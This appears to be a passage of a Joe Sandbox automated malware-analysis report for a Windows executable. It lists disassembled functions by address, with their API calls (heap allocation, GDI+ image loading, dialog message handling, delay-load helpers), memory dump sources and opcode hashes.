                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 5ca11521258d29842ea965bfad981ce15d61f0574ca4f839e8de733854ee9bec
                          • Instruction ID: 62508c44bd8b4d139a50e936420c13223e0050dde0a54c25db9907c667c81c13
                          • Opcode Fuzzy Hash: 5ca11521258d29842ea965bfad981ce15d61f0574ca4f839e8de733854ee9bec
                          • Instruction Fuzzy Hash: DAD022A9244F0234BC0B37B83C960EF234C5852BB03F10F46FB20CE1E2EE1484286112
                          Function 0038DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DloadLock.DELAYIMP ref: 0038DC73
                          • DloadProtectSection.DELAYIMP ref: 0038DC8F
                            • Part of subcall function 0038DE67: DloadObtainSection.DELAYIMP ref: 0038DE77
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Dload$Section$LockObtainProtect
                          • String ID:
                          • API String ID: 731663317-0
                          • Opcode ID: ba6c4c51ca1d574af38901f2e1a4ca946cbbabf74dbc918fb9614c4194baecb6
                          • Instruction ID: fb6b62854d4e2ae77de463592c2fafe6370a35d7a09fb2c58c45af42aa2744ac
                          • Opcode Fuzzy Hash: ba6c4c51ca1d574af38901f2e1a4ca946cbbabf74dbc918fb9614c4194baecb6
                          • Instruction Fuzzy Hash: ACD0C9705113005AC61BBB14B98675C23B8B705B44F6406A2E1068F5E0DFA84880D705
                          Function 003712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemShowWindow
                          • String ID:
                          • API String ID: 3351165006-0
                          • Opcode ID: a5833bd7c0ea025e3cd9cbf4a8b88ff9fb354fb9aca3706e65db63cbe7b50f15
                          • Instruction ID: c8835073da4a2f93a4a5b5f6c777059971234284606ef0726a66e0384b585eda
                          • Opcode Fuzzy Hash: a5833bd7c0ea025e3cd9cbf4a8b88ff9fb354fb9aca3706e65db63cbe7b50f15
                          • Instruction Fuzzy Hash: F8C01232058201BECB020BB0EC09D2FBBACABA5312F05C90AB2A5C0060C238C010DB11
                          Function 003719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 15982e5d319c234dbe93f42f8bfd7a3328b57dc2bc6b899d2417fa9b95fff5f3
                          • Instruction ID: 248b054df807bc8f285587efb827c06c864be0c11a31a02b7063ae675de8709b
                          • Opcode Fuzzy Hash: 15982e5d319c234dbe93f42f8bfd7a3328b57dc2bc6b899d2417fa9b95fff5f3
                          • Instruction Fuzzy Hash: 16C19432A042449FDF37CF6CC485BA97BA5EF06310F0984B9DC499F286CB399944CB61
                          Function 00373B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 42adea50bb87bf9d0fbed5b2ae284881553e4cc2462ff690787e33fae91025c7
                          • Instruction ID: 919d10d44d9e853cbc07bb03a45ea1d734664435e1d7449094679f4c577b0960
                          • Opcode Fuzzy Hash: 42adea50bb87bf9d0fbed5b2ae284881553e4cc2462ff690787e33fae91025c7
                          • Instruction Fuzzy Hash: 7F719C71104F449EDB36DB70CC51AEBB7E8AB14301F44896EE5AE4B242DB356A48EF10
                          Function 0037837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00378384
                            • Part of subcall function 00371380: __EH_prolog.LIBCMT ref: 00371385
                            • Part of subcall function 00371380: new.LIBCMT ref: 003713FE
                            • Part of subcall function 003719A6: __EH_prolog.LIBCMT ref: 003719AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 519b1f1c4e44da8a0a1eb3523b5bb9bf03c0622f1ff93a8b2390fd08d8d01483
                          • Instruction ID: 813ee9b6268b534e6a4bb2b7d4a11d82d02737dc8e4109d550124c2eff24b30f
                          • Opcode Fuzzy Hash: 519b1f1c4e44da8a0a1eb3523b5bb9bf03c0622f1ff93a8b2390fd08d8d01483
                          • Instruction Fuzzy Hash: 1641C7318406549ADB32E761CC55BFA73B8AF50300F0580EAE54EA7453DFB85EC8DB50
                          Function 00371E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00371E05
                            • Part of subcall function 00373B3D: __EH_prolog.LIBCMT ref: 00373B42
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 64f43a044d2510d4256900c99ad59f2fc10be2aa35956111fb647189e3f6c8ce
                          • Instruction ID: 87ae9b6cd6437add2ec907887ca7e8b0b3f0cb5016bd2fd1e8ba9af0be885e3c
                          • Opcode Fuzzy Hash: 64f43a044d2510d4256900c99ad59f2fc10be2aa35956111fb647189e3f6c8ce
                          • Instruction Fuzzy Hash: D8213C729042089FCB26EF99D9419EEBBF5FF58300B1044ADE849A7651CB365E10DB61
                          Function 0038A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 0038A7C8
                            • Part of subcall function 00371380: __EH_prolog.LIBCMT ref: 00371385
                            • Part of subcall function 00371380: new.LIBCMT ref: 003713FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 2651388161bb3bf4cb23c16ce6a024e1673d80d056f39f92e28cd5152a6163fb
                          • Instruction ID: bf878ffd66eae597005b03a6dbf12f6a71e0105570f4f4d031c9f752edb17f28
                          • Opcode Fuzzy Hash: 2651388161bb3bf4cb23c16ce6a024e1673d80d056f39f92e28cd5152a6163fb
                          • Instruction Fuzzy Hash: B7217176C042599ECF16EF58C9415EEBBB4EF19300F0044EEE809AB242D7356E06DB61
                          Function 003792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 25195b23ad65db8a1767a9933113aaf88dc1c9cb62146519db8418966c91018e
                          • Instruction ID: 2f4adcac20204fafcfa7d6c21217c069ca81b3c8517b9197b4e316f4aa6751df
                          • Opcode Fuzzy Hash: 25195b23ad65db8a1767a9933113aaf88dc1c9cb62146519db8418966c91018e
                          • Instruction Fuzzy Hash: 05116577D105289BCB37AFA8CC51ADDB735EF48750F058216F81DBB251DA398D1187A0
                          Function 0037AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                          • Instruction ID: 4e66623687d975541a5fba58969b0396c1333348a062bf2e6f0cd94c6f439e06
                          • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                          • Instruction Fuzzy Hash: 0CF08C31914B059FDBB1DA78C941A1AB7E8EB51320F20C91AE49EC6680E778D880CB42
                          Function 003985A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00398FD3,00000001,00000364,?,00393713,00000050,?,003B0EE8,00000200), ref: 003985EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 7e221c868df40995257ed2e364b4a11cae2e7f4c089f0e030dd9bab1ee17e6c7
                          • Instruction ID: d1b0d0c2bbfbe628ee1fe34bc606dd62d3117a0099293186865478cb08951064
                          • Opcode Fuzzy Hash: 7e221c868df40995257ed2e364b4a11cae2e7f4c089f0e030dd9bab1ee17e6c7
                          • Instruction Fuzzy Hash: 40F0BE31641121ABEF231F269C01B5B778CAFC37A0B178111AD18EA081CE20DD098AE8
                          Function 00375BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00375BDC
                            • Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 524586bb044b8a8ba5df5240b59e18e34f4a97c65f5085f6c4e3b758ac6c5287
                          • Instruction ID: df401203f53735423693b10a787f0a7113efbd1786e09e26009d7380a9277ea0
                          • Opcode Fuzzy Hash: 524586bb044b8a8ba5df5240b59e18e34f4a97c65f5085f6c4e3b758ac6c5287
                          • Instruction Fuzzy Hash: D601AD30A10684DEC736F7A8C0053EDF7A4AF19300F40909DA89E17283CBB81B08D7A2
                          Function 00398518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: be18b43f664455805086ef63d8d1313673a065bd1b3011e57b1cd646c26ef8de
                          • Instruction ID: 3a44d1ac6595d0e93c7d7d12b37dd5b5ae2207c33a8420f1a215b2ad646b2e74
                          • Opcode Fuzzy Hash: be18b43f664455805086ef63d8d1313673a065bd1b3011e57b1cd646c26ef8de
                          • Instruction Fuzzy Hash: 6CE065255461659BEF332B699C01B9A778C9BC37B0F174611AD54E6491CF20CC0545E5
                          Function 0037A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0037A4F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: dc1f992f99ec8e8d2879e97ab34082e6caee9ca6f108a9a1315272cc3f5fd898
                          • Instruction ID: 5118194156ddb35c7d878d8af8092d315dc51d5b3e7a548f2c9de602bf0de6dc
                          • Opcode Fuzzy Hash: dc1f992f99ec8e8d2879e97ab34082e6caee9ca6f108a9a1315272cc3f5fd898
                          • Instruction Fuzzy Hash: 30F0E931009B80AACA335B7848047CEBBA46F46331F04CA4DF1FD16192C3BD14859723
                          Function 0038067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                          Download Yara Rule
                          APIs
                          • SetThreadExecutionState.KERNEL32(00000001), ref: 003806B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ExecutionStateThread
                          • String ID:
                          • API String ID: 2211380416-0
                          • Opcode ID: b333e1545f33d5fef620bccc009754adcf0ccae0fe8b9e3206f6933e71db0091
                          • Instruction ID: bb4c7f6e86f97863a469f4e9dc14e3ebe05e2d6cfd5a1de8624bcec8a00e54c1
                          • Opcode Fuzzy Hash: b333e1545f33d5fef620bccc009754adcf0ccae0fe8b9e3206f6933e71db0091
                          • Instruction Fuzzy Hash: E6D02B2870031026C63B3364A8067FF1A0E4FC3710F0910A1B10D1B9878B8A08CB67F2
                          Function 00389D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GdipAlloc.GDIPLUS(00000010), ref: 00389D81
                            • Part of subcall function 00389B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00389B30
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Gdip$AllocBitmapCreateFromStream
                          • String ID:
                          • API String ID: 1915507550-0
                          • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                          • Instruction ID: 8266ffe79207e811bc30cc4314fbbb780af41c3b1c1e76f2f829d340c18f961f
                          • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                          • Instruction Fuzzy Hash: 5ED0C73065830DBADF43BA759C02B7A7BEDDB00350F1445B7BC088A151ED71DE24A765
                          Function 00379989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetFileType.KERNELBASE(000000FF,00379887), ref: 00379995
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID:
                          • API String ID: 3081899298-0
                          • Opcode ID: c8c9de3b411a1066ff39fd48f3e7fcafaaa137ddcba89839c78456767c47d03b
                          • Instruction ID: 06f6a0dfbb37439d7f67478e5929191ca2b55bc3550141ba3821875379d91b05
                          • Opcode Fuzzy Hash: c8c9de3b411a1066ff39fd48f3e7fcafaaa137ddcba89839c78456767c47d03b
                          • Instruction Fuzzy Hash: 8AD01231011140959F3386344D49299B755DB83376B3AC7A9E129C40A1D727C803F542
                          Function 0038D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0038D43F
                            • Part of subcall function 0038AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
                            • Part of subcall function 0038AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
                            • Part of subcall function 0038AC74: IsDialogMessageW.USER32(0001045C,?), ref: 0038ACAA
                            • Part of subcall function 0038AC74: TranslateMessage.USER32(?), ref: 0038ACB8
                            • Part of subcall function 0038AC74: DispatchMessageW.USER32(?), ref: 0038ACC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                          • String ID:
                          • API String ID: 897784432-0
                          • Opcode ID: ca318308a8af705722ea03bfabb25ef4a12a963ea0ac4c1e884bf9b714439b7c
                          • Instruction ID: 7f2696586d9a0b72ac3c7dafd430afc31cbfb322caa64300d65a4f8b30b1f333
                          • Opcode Fuzzy Hash: ca318308a8af705722ea03bfabb25ef4a12a963ea0ac4c1e884bf9b714439b7c
                          • Instruction Fuzzy Hash: 2AD09E71144300ABD6132B51DE07F0F7AAABB98B09F004655B348740B18A629D20DB16
                          Function 0038D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
